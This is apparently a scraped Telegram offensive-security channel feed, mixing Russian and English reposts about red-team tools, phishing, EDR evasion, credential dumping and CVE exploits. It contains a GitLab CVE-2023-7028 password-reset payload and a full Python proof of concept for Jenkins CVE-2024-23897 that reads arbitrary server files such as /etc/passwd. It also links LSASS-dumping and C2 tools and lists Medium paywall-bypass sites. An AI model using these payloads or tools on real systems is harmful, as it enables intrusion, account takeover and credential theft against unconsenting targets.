Forwarded from Управление Уязвимостями и прочее
Курьёзная критичная уязвимость в GitLab - восстановление пароля от аккаунта на левый email (CVE-2023-7028). 🤦♂️🙂 Уязвимы версии GitLab CE/EE с 16.1.0. CVSS 10. Патчи доступны.
Как это произошло?
В версии 16.1.0 было внесено изменение, позволяющее пользователям сбрасывать свой пароль используя дополнительный адрес электронной почты. Уязвимость является результатом ошибки в процессе верификации электронной почты.
В микроблогах пишут, что PoC буквально такой:
Пользователи, у которых включена двухфакторная аутентификация, уязвимы для сброса пароля, но не для захвата учетной записи, поскольку для входа в систему требуется второй фактор аутентификации.
Двухфакторка рулит. GitLab - решето. 🙂
@avleonovrus #GitLab
Как это произошло?
В версии 16.1.0 было внесено изменение, позволяющее пользователям сбрасывать свой пароль используя дополнительный адрес электронной почты. Уязвимость является результатом ошибки в процессе верификации электронной почты.
В микроблогах пишут, что PoC буквально такой:
user[email][][email protected]&user[email][][email protected]
Пользователи, у которых включена двухфакторная аутентификация, уязвимы для сброса пароля, но не для захвата учетной записи, поскольку для входа в систему требуется второй фактор аутентификации.
Двухфакторка рулит. GitLab - решето. 🙂
@avleonovrus #GitLab
🔥10❤2👍1
Forwarded from Похек (Sergey Zybnev)
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤2
Forwarded from Offensive Xwitter
😈 [ Octoberfest7 @Octoberfest73 ]
I'm exited to release GraphStrike, a project I completed during my internship at @RedSiege. Route all of your Cobalt Strike HTTPS traffic through graph.microsoft.com.
Tool:
🔗 https://github.com/RedSiege/GraphStrike?tab=readme-ov-file
Dev blog:
🔗 https://redsiege.com/blog/2024/01/graphstrike-developer
🐥 [ tweet ]
I'm exited to release GraphStrike, a project I completed during my internship at @RedSiege. Route all of your Cobalt Strike HTTPS traffic through graph.microsoft.com.
Tool:
🔗 https://github.com/RedSiege/GraphStrike?tab=readme-ov-file
Dev blog:
🔗 https://redsiege.com/blog/2024/01/graphstrike-developer
🐥 [ tweet ]
🔥8👍1
Learn the process of crafting a personalized RDI/sRDI loader in C and ASM, incorporating code optimization to achieve full position independence.
🔗 https://blog.malicious.group/writing-your-own-rdi-srdi-loader-using-c-and-asm/
#maldev #reflective #dll #clang #asm
Please open Telegram to view this post
VIEW IN TELEGRAM
Malicious Group
Writing your own RDI /sRDI loader using C and ASM
In this post, I am going to show the readers how to write their own RDI/sRDI loader in C, and then show how to optimize the code to make it fully position independent.
🔥12👍2
Forwarded from Похек (Sergey Zybnev)
Jenkins RCE CVE-2024-23897
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j.
PoC
Использование:
🌚 @poxek
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j.
PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys
if len(sys.argv) != 3:
print('[*] usage: python poc.py https://127.0.0.1:8888/ [/etc/passwd]')
exit()
data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())
print(f'REQ: {data_bytes}\n')
def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')
def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)
t1.start()
time.sleep(0.1)
t2.start()
t1.join()
t2.join()
Использование:
python poc.py https://127.0.0.1:8888/ [/etc/passwd]
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15❤🔥4❤2🔥1
😴 Creating Object File Monstrosities with Sleep Mask and LLVM
The Mutator kit is now part of the Cobalt Strike Arsenal Kit. It allows you to mutate BOFs, sleep masks and more with LLVM.
Read about it on the blog:
🔗 https://www.cobaltstrike.com/blog/introducing-the-mutator-kit-creating-object-file-monstrosities-with-sleep-mask-and-llvm
#c2 #sleepmask #llvm #redteam
The Mutator kit is now part of the Cobalt Strike Arsenal Kit. It allows you to mutate BOFs, sleep masks and more with LLVM.
Read about it on the blog:
🔗 https://www.cobaltstrike.com/blog/introducing-the-mutator-kit-creating-object-file-monstrosities-with-sleep-mask-and-llvm
#c2 #sleepmask #llvm #redteam
👍5
298559809-27f286d7-e0e3-47ab-864a-e040f8749708.mp4
1.2 MB
This vulnerability targets the Common Log File System (CLFS) and allows attackers to escalate privileges and potentially fully compromise an organization’s Windows systems. In April 2023, Microsoft released a patch for this vulnerability and the CNA CVE-2023-28252 was assigned.
📊 Affects version:
— Windows 11 21H2 (clfs.sys version 10.0.22000.1574);
— Windows 11 22H2;
— Windows 10 21H2;
— Windows 10 22H2;
— Windows Server 2022.
Research:
🔗 https://www.coresecurity.com/core-labs/articles/analysis-cve-2023-28252-clfs-vulnerability
Exploit:
🔗 https://github.com/duck-sec/CVE-2023-28252-Compiled-exe
#windows #privesc #clfs #driver
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
This is a custom-developed .NET data collector tool which can be used to enumerate Active Directory environments via the Active Directory Web Services (ADWS) protocol.
Tool:
🔗 https://github.com/FalconForceTeam/SOAPHound
Research:
🔗 https://falconforce.nl/soaphound-tool-to-collect-active-directory-data-via-adws/
#ad #windows #bloodhound #soap #adws
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7👍3
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - boku7/azureOutlookC2: Azure Outlook Command & Control (C2) - Remotely control a compromised Windows Device from your Outlook…
Azure Outlook Command & Control (C2) - Remotely control a compromised Windows Device from your Outlook mailbox. Threat Emulation Tool for North Korean APT InkySquid / ScarCruft / APT37. TTP...
👍8
This is an offline BloodHound ingestor and LDAP result parser. BOFHound allows operators to utilize BloodHound's beloved interface while maintaining full control over the LDAP queries being run and the spped at which they are executed. This leaves room for operator discretion to account for potential honeypot accounts, expensive LDAP query thresholds and other detection mechanisms designed with the traditional, automated BloodHound collectors in mind.
Tools:
🔗 https://github.com/coffeegist/bofhound
Research:
🔗 https://posts.specterops.io/bofhound-session-integration-7b88b6f18423
#c2 #bof #cobaltstrike #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - coffeegist/bofhound: Generate BloodHound compatible JSON from logs written by ldapsearch BOF, pyldapsearch and Brute Ratel's…
Generate BloodHound compatible JSON from logs written by ldapsearch BOF, pyldapsearch and Brute Ratel's LDAP Sentinel - coffeegist/bofhound
🔥7❤1👍1
Using a combination of Cloudflare and HTML Obfuscation, it is possible to protect your Evilginx server from being flagged as deceptive and so increase your chances of success on Red Team and Social Engineering engagements.
Source:
🔗 https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation
#phishing #cloudflare #evilginx #html
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9
⛓ Trusted Domain, Hidden Danger
In this blog post describes a prevalent tactic used in phishing attacks, which involves exploiting legitimate platforms for redirection through deceptive links.
Source:
🔗 https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trusted-domain-hidden-danger-deceptive-url-redirections-in-email-phishing-attacks/
#phishing #url #redirect
In this blog post describes a prevalent tactic used in phishing attacks, which involves exploiting legitimate platforms for redirection through deceptive links.
Source:
🔗 https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trusted-domain-hidden-danger-deceptive-url-redirections-in-email-phishing-attacks/
#phishing #url #redirect
🔥10
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Набор инструментов для удалённого дампа паролей.
https://github.com/Slowerzs/ThievingFox/
Ну и сам блог:
https://blog.slowerzs.net/posts/thievingfox/
#pentest #redteam #creds
https://github.com/Slowerzs/ThievingFox/
Ну и сам блог:
https://blog.slowerzs.net/posts/thievingfox/
#pentest #redteam #creds
🔥10
This media is not supported in your browser
VIEW IN TELEGRAM
A little lifehack if you, like me, come across paid articles from Medium. These sites allow you to read paid Medium articles for free:
🔗 https://freedium.cfd/<URL>
🔗 https://medium-forall.vercel.app/
🔗 https://readmedium.com/<URL>
#medium #premium #bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17👍7❤🔥5
⚙️ Introduction to Bypassing Hooks EDR
The article explores methods of bypassing EDR hooks in the user mode of the Windows operating system, starting with an explanation of system calls and their role in transitioning between user and kernel modes. Subsequently, various techniques for bypassing hooks are discussed, including direct and indirect syscalls, along with their advantages and potential limitations when used for evading protective mechanisms.
🔗 https://malwaretech.com/2023/12/an-introduction-to-bypassing-user-mode-edr-hooks.html
#maldev #edr #hooks #syscalls
The article explores methods of bypassing EDR hooks in the user mode of the Windows operating system, starting with an explanation of system calls and their role in transitioning between user and kernel modes. Subsequently, various techniques for bypassing hooks are discussed, including direct and indirect syscalls, along with their advantages and potential limitations when used for evading protective mechanisms.
🔗 https://malwaretech.com/2023/12/an-introduction-to-bypassing-user-mode-edr-hooks.html
#maldev #edr #hooks #syscalls
Malwaretech
An Introduction to Bypassing User Mode EDR Hooks
Understanding the basics of user mode EDR hooking, common bypass techniques, and their limitations.
🔥8👍2
It’s a really powerful security automation platform for those of us who are working on defense side.
🚀 The platform solves such problems as:
— Issues deduplication (within incremental scans + between different scanners using rules);
— Automated verification (using rules);
— Automated resolving (if the issue doesn’t exist in a new report);
— Running of custom tools in a sequence (like Subfinder -> Naabu -> Httpx-> Nuclei);
— Sequences scheduling.
🔗 Source:
https://gitlab.com/whitespots-public/appsec-portal
#devsecops #sast #dast #osa #automation
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
How to automate vulnerability scanning process?
Use Whitespots Appliation Security portal to quickly discover vulnerabilities within a few clicks
🔥7❤🔥4👎2
⚙️ MultiDump
This is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly. MultiDump supports LSASS dump via ProcDump.exe or Comsvc.dll, it offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis
🔗 https://github.com/Xre0uS/MultiDump
#lsass #remote #cpp #python
This is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly. MultiDump supports LSASS dump via ProcDump.exe or Comsvc.dll, it offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis
🔗 https://github.com/Xre0uS/MultiDump
#lsass #remote #cpp #python
🔥14❤🔥5👎3
🔑 I Know What Your Password Was Last Summer...
This is a blog post about password analysis and some research regarding frequently hacked NTLM passwords.
🔗 https://labs.lares.com/password-analysis/
#bruteforce #hashcat #ntlm
This is a blog post about password analysis and some research regarding frequently hacked NTLM passwords.
🔗 https://labs.lares.com/password-analysis/
#bruteforce #hashcat #ntlm
Lares Labs
I Know What Your Password Was Last Summer...
We have spent the last six months researching on the previous two years of prior cracked passwords and built some tools to understand password creation strategies better. Here are the results.
🔥8👍2
Forwarded from SecuriXy.kz
Теперь можно извлекать учетные данные без обращения к диску (Dumping credentials without touching disk) с помощью утилиты #go-secdump которая поддерживает и SOCKS Proxy решая проблему #Impacket
https://github.com/jfjallid/go-secdump
скоро и в Impacket запилят и будет красота
https://github.com/fortra/impacket/pull/1698
https://github.com/jfjallid/go-secdump
скоро и в Impacket запилят и будет красота
https://github.com/fortra/impacket/pull/1698
🔥14❤1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-21413: Microsoft Outlook Leak Hash
https://github.com/duy-31/CVE-2024-21413
#exploit #pentest #redteam #ad
https://github.com/duy-31/CVE-2024-21413
#exploit #pentest #redteam #ad
GitHub
GitHub - duy-31/CVE-2024-21413: Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC - duy-31/CVE-2024-21413
🔥5❤2👍1